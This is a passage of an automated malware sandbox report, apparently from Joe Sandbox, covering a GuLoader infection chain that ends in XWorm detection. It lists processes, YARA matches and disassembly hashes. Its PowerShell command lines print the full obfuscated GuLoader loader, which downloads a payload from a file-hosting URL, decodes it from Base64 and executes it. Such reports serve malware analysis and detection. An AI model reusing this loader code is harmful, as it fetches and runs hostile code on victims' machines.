m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
                                                                                                      Imagebase:0x7ff7b2bb0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:15:08:06
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
                                                                                                      Imagebase:0x7ff73b120000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:15:08:14
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
                                                                                                      Imagebase:0xf20000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:15:08:15
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:15:08:36
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                      Imagebase:0xac0000
                                                                                                      File size:516'608 bytes
                                                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:15:11:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
                                                                                                      Imagebase:0x530000
                                                                                                      File size:483'680 bytes
                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 00007FF7C193B8C2 Relevance: .5, Instructions: 458COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1895849808.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b8a4500cb7c8e1043da42c3dddf55f4e286fd666023187439842c69ba131f27
                                                                                                        • Instruction ID: ba76072de791c1ce613726c494bda35440d1968e6c6cb067a4e8b60c6a2f0533
                                                                                                        • Opcode Fuzzy Hash: 3b8a4500cb7c8e1043da42c3dddf55f4e286fd666023187439842c69ba131f27
                                                                                                        • Instruction Fuzzy Hash: F8E1C330908A8E8FEBA8EF28C8557E977E1FB55311F44427ED84EC7295CE78A9418781
                                                                                                        Function 00007FF7C193AB5A Relevance: .4, Instructions: 445COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1895849808.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c2ed45359cf1b710e3938073d09e5fdd343b2bd88d7eae212a3b6d2b812847a
                                                                                                        • Instruction ID: 818203ba50a8cb11d62b72524872412a80962ce83cc16dc10a62be936c5bea55
                                                                                                        • Opcode Fuzzy Hash: 0c2ed45359cf1b710e3938073d09e5fdd343b2bd88d7eae212a3b6d2b812847a
                                                                                                        • Instruction Fuzzy Hash: 50E18330908A8D8FEBA8EF28D8557E9B7E1FF54311F44427AE80DC7391DB74A9458B81
                                                                                                        Function 00007FF7C1A04185 Relevance: .6, Instructions: 610COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1896680622.00007FF7C1A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1a00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 154dde544525fcc7aa2550bbf9369cc374fc2835a5765309c78c7467b9d1983d
                                                                                                        • Instruction ID: efa9a3f3ac7dcccf32d9ee0281307bdc15490a1ce33e25813cdc514dacdb8a9a
                                                                                                        • Opcode Fuzzy Hash: 154dde544525fcc7aa2550bbf9369cc374fc2835a5765309c78c7467b9d1983d
                                                                                                        • Instruction Fuzzy Hash: F7120831A0DACA4FE755EF3858556B8BBE1FF4A324B5802BFC08EC71D3D968A8458351
                                                                                                        Function 00007FF7C1A0532D Relevance: .4, Instructions: 358COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1896680622.00007FF7C1A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1a00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 62277af98f5bcb569b6f15447ee0802e0432e1c59ba87283e1c0dcc8196846c4
                                                                                                        • Instruction ID: c6656e6e29a5bf86a70455ddf8763b8adbea1569e17c123c1b6fd952f6671a88
                                                                                                        • Opcode Fuzzy Hash: 62277af98f5bcb569b6f15447ee0802e0432e1c59ba87283e1c0dcc8196846c4
                                                                                                        • Instruction Fuzzy Hash: 74B13931E0DA898FE795EB389854AB9BBD2EF55320B8801BFC00EC71D3DE55AC418751
                                                                                                        Function 00007FF7C193C020 Relevance: .3, Instructions: 272COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1895849808.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9a7b6553f3d7435e0eb636a8b86250353bb2520145b2b78a924868d7e61bf79f
                                                                                                        • Instruction ID: 8572385d87c4c471f22383f0e95b4e289df87df0ff1c3d7e0ede38b3544f979e
                                                                                                        • Opcode Fuzzy Hash: 9a7b6553f3d7435e0eb636a8b86250353bb2520145b2b78a924868d7e61bf79f
                                                                                                        • Instruction Fuzzy Hash: 7C81373061CE894FD788EF1CC485AB5B7E1FF99365B5005BED08AC32A6DA65F842C740
                                                                                                        Function 00007FF7C1A042E7 Relevance: .1, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1896680622.00007FF7C1A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1a00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d6652c3bc9f442059df7f33607727a365a5a3a4b677a66df43429cf38745c6e9
                                                                                                        • Instruction ID: be9aad7f1c069cb697ed2cbe32374762cc7f4d77d686ff5cf00fb36ea291758b
                                                                                                        • Opcode Fuzzy Hash: d6652c3bc9f442059df7f33607727a365a5a3a4b677a66df43429cf38745c6e9
                                                                                                        • Instruction Fuzzy Hash: 4B41B221E1DE864FE798EB3C5891AB8F7D2FF45761B9502BAD00FC31D2DE29A8408351
                                                                                                        Function 00007FF7C1A05452 Relevance: .1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1896680622.00007FF7C1A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1a00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 179efcb2c126b87548f9e458ca4f1e9c05bde0bb04d82155a183139b63579961
                                                                                                        • Instruction ID: ab16d84768b3b07a5f6e506e169c293dcd0e255cd52e6b52451afde19fa285e7
                                                                                                        • Opcode Fuzzy Hash: 179efcb2c126b87548f9e458ca4f1e9c05bde0bb04d82155a183139b63579961
                                                                                                        • Instruction Fuzzy Hash: 8E31C122E1EE878BE798AB3868556FCEAC2FF45771F9502BAD00FC31D3DE1968404251
                                                                                                        Function 00007FF7C1933945 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1895849808.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff7c1930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction ID: 5cb752799bb2fc33c979692c426e6d91cd5435c7450f34190a306e11ef79e676
                                                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                        • Instruction Fuzzy Hash: D101A73010CB0C8FD744EF0CE451AA5B3E0FB95364F50056EE58AC3651D632E881CB41

                                                                                                        Executed Functions

                                                                                                        Function 00C4E928 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37f70455bdbf53fcd7f3889e41d343ca0559d2b7635257a859b65072dc8dcf33
                                                                                                        • Instruction ID: bc207c3041990c72a6b0db7cd57b104a6fcb70bd8ccc24e633f768ae22ac23f4
                                                                                                        • Opcode Fuzzy Hash: 37f70455bdbf53fcd7f3889e41d343ca0559d2b7635257a859b65072dc8dcf33
                                                                                                        • Instruction Fuzzy Hash: D9B15D70E00219CFDF14CFA9C8857EEBBF2BF88714F158129E815A7294EB749946CB81
                                                                                                        Function 00C4F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 293cb1418216fea2911fe9f48cce15600828f521391c6de58b684c3b3e1509d7
                                                                                                        • Instruction ID: c99219f5528c2f9fde7e0e59e4327d82de9ab60956290a54fed1307b7cc4c30b
                                                                                                        • Opcode Fuzzy Hash: 293cb1418216fea2911fe9f48cce15600828f521391c6de58b684c3b3e1509d7
                                                                                                        • Instruction Fuzzy Hash: 41B14D70E002198FDF14CFA9D8817AEBBF2BF88314F24853DD815A7294EB749946CB81
                                                                                                        Function 06E347D0 Relevance: 13.4, Strings: 10, Instructions: 931COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$84l$84l
                                                                                                        • API String ID: 0-252953923
                                                                                                        • Opcode ID: 0a1b9899de3fdc3a6764fff9d38d1919f16ae8cc4ae6c138e3155f909d004092
                                                                                                        • Instruction ID: 10a9f36d777050682b0bd6615db20213d62f62a410f239f722e19a200752a38a
                                                                                                        • Opcode Fuzzy Hash: 0a1b9899de3fdc3a6764fff9d38d1919f16ae8cc4ae6c138e3155f909d004092
                                                                                                        • Instruction Fuzzy Hash: 33827C74B00324DFD764DB94C549AAAB7F2AF85305F24D069D906AF395CB72EC42CB81
                                                                                                        Function 06E35185 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl
                                                                                                        • API String ID: 0-3144609269
                                                                                                        • Opcode ID: 18254739ba46b495823437e994fc1a83fceab387ee8442173e4e01c1fd16e408
                                                                                                        • Instruction ID: 19622c42b6741a82b81859cd126218f1d6e70d0105f44692a2aa0c00e4b4babf
                                                                                                        • Opcode Fuzzy Hash: 18254739ba46b495823437e994fc1a83fceab387ee8442173e4e01c1fd16e408
                                                                                                        • Instruction Fuzzy Hash: C4125974A00320DFD7A4CB94C549EAAB7B2AF84309F25D059E90AAF355C776EC46CB81
                                                                                                        Function 06E3E150 Relevance: 3.0, Strings: 2, Instructions: 518COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: a8a96bc1287189cd64400836795ca84af71e915b8cd9fa8e30a20cfe8710ae3d
                                                                                                        • Instruction ID: 0b26d789e9fb0f59c12222af66b74b506c56dd74d312f9e05bce509e6aeca142
                                                                                                        • Opcode Fuzzy Hash: a8a96bc1287189cd64400836795ca84af71e915b8cd9fa8e30a20cfe8710ae3d
                                                                                                        • Instruction Fuzzy Hash: 2212C335B00325CFDBA4DB64C549BAAB7F2AF89214F24806BD905AF355DB32DC41CBA1
                                                                                                        Function 06E3C659 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 554709524082ae40601b1fd283f5bb5ec0a17f989bf1a25d00dd5ff9f34d1f28
